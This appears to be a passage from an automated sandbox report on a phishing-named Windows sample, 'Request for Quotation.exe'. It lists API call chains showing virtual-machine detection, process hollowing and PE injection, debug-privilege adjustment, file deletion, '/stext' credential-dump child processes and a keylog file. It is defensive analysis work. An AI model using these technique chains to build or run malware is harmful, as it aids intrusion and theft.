V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_tr1_1_00410586
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_1_0040728F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,1_1_0040728F
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_1_0040477E _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,#23,#4,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_s1_1_0040477E
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_1_00403325 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,1_1_00403325
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_1_00412BEE wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,1_1_00412BEE
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_2_0040AE51 FindFirstFileW,FindNextFileW,3_2_0040AE51
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 4_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,4_2_00407898
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 5_2_00407C87 FindFirstFileA,FindNextFileA,strlen,strlen,5_2_00407C87
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_2_00403C4A ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ,?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,GetLogicalDriveStringsA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$cha1_2_00403C4A
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_2_00418981 memset,GetSystemInfo,3_2_00418981
          Source: Request for Quotation.exe, 00000000.00000002.642779370.0000000000688000.00000004.00000020.sdmpBinary or memory string: ECVMWar&Prod_VMware_c
          Source: Request for Quotation.exe, 00000001.00000002.903364416.0000000000767000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Users\user\Desktop\Request for Quotation.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,3_2_0040DD85
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 0_2_6F711A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_6F711A98
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 0_2_6EEE6B57 mov eax, dword ptr fs:[00000030h]0_2_6EEE6B57
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 0_2_6EEE6E07 mov eax, dword ptr fs:[00000030h]0_2_6EEE6E07
          Source: C:\Users\user\Desktop\Request for Quotation.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          Contains functionality to inject code into remote processesShow sources
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_2_0040F219 _EH_prolog,CloseHandle,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,1_2_0040F219
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\Request for Quotation.exeMemory written: C:\Users\user\Desktop\Request for Quotation.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeMemory written: C:\Users\user\Desktop\Request for Quotation.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeMemory written: C:\Users\user\Desktop\Request for Quotation.exe base: 400000 value starts with: 4D5AJump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\Request for Quotation.exeSection loaded: unknown target: C:\Users\user\Desktop\Request for Quotation.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: GetCurrentProcessId,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,OpenMutexA,CloseHandle,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,OpenProcess,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,_wgetenv,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,_wgetenv,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,CloseHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, \svchost.exe1_2_0040A5F5
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: GetCurrentProcessId,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,OpenMutexA,CloseHandle,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,OpenProcess,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,_wgetenv,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,_wgetenv,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,CloseHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, \svchost.exe1_1_0040A5F5
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_2_00410145 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,StrToIntA,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,mouse_event,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,1_2_00410145
          Source: C:\Users\user\Desktop\Request for Quotation.exeProcess created: C:\Users\user\Desktop\Request for Quotation.exe 'C:\Users\user\Desktop\Request for Quotation.exe' Jump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeProcess created: C:\Users\user\Desktop\Request for Quotation.exe 'C:\Users\user\Desktop\Request for Quotation.exe' /stext 'C:\Users\user\AppData\Local\Temp\hbieekorpghvpuxbpehxjpq'Jump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeProcess created: C:\Users\user\Desktop\Request for Quotation.exe 'C:\Users\user\Desktop\Request for Quotation.exe' /stext 'C:\Users\user\AppData\Local\Temp\rvowfdgtdozazitngptymckjrq'Jump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeProcess created: C:\Users\user\Desktop\Request for Quotation.exe 'C:\Users\user\Desktop\Request for Quotation.exe' /stext 'C:\Users\user\AppData\Local\Temp\uptpyvrmrwrfbohrpagsxhxaawaqan'Jump to behavior
          Source: Request for Quotation.exe, 00000001.00000002.903407196.0000000000DF0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: Request for Quotation.exe, 00000001.00000002.903407196.0000000000DF0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: Request for Quotation.exe, 00000001.00000002.903407196.0000000000DF0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: Request for Quotation.exe, 00000001.00000002.903512779.00000000022F6000.00000004.00000040.sdmpBinary or memory string: Program Manageranagerz
          Source: Request for Quotation.exe, 00000001.00000002.903512779.00000000022F6000.00000004.00000040.sdmpBinary or memory string: Program Manageranager
          Source: logs.dat.1.drBinary or memory string: [ Program Manager ]
          Source: Request for Quotation.exe, 00000001.00000002.903512779.00000000022F6000.00000004.00000040.sdmpBinary or memory string: Program Managerinistrator
          Source: Request for Quotation.exe, 00000001.00000002.903407196.0000000000DF0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
